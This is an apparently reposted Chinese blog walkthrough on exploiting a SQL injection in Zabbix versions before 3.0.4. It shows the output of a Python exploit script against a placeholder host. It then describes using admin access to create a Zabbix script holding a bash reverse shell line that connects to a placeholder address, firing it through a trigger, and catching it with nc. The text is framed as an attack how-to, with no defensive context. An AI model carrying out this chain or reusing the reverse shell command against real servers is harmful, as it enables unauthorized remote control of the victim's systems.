Zabbix sql注入漏洞脚本执行反弹shell
Posted 做一个有灵魂的人
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Zabbix sql注入漏洞脚本执行反弹shell相关的知识,希望对你有一定的参考价值。
exp检测是否存在SQL注入漏洞
root@ubuntu:~# python zabbix.py http://ip:9090/
+------------------------------------------------------------+
Python Zabbix<3.0.4 SQL注入 Exploit
success
+------------------------------------------------------------+
Zabbix 存在SQL注入漏洞!
管理员 用户名密码:None
管理员 Session_id:None
然后进行登录:管理——脚本——创建脚本写入反弹shell、
bash -i >& /dev/tcp/xxx/1234 0>&1
监测——触发器——主机
执行我们编写的反弹shell脚本:
Nc监听端口
以上是关于Zabbix sql注入漏洞脚本执行反弹shell的主要内容,如果未能解决你的问题,请参考以下文章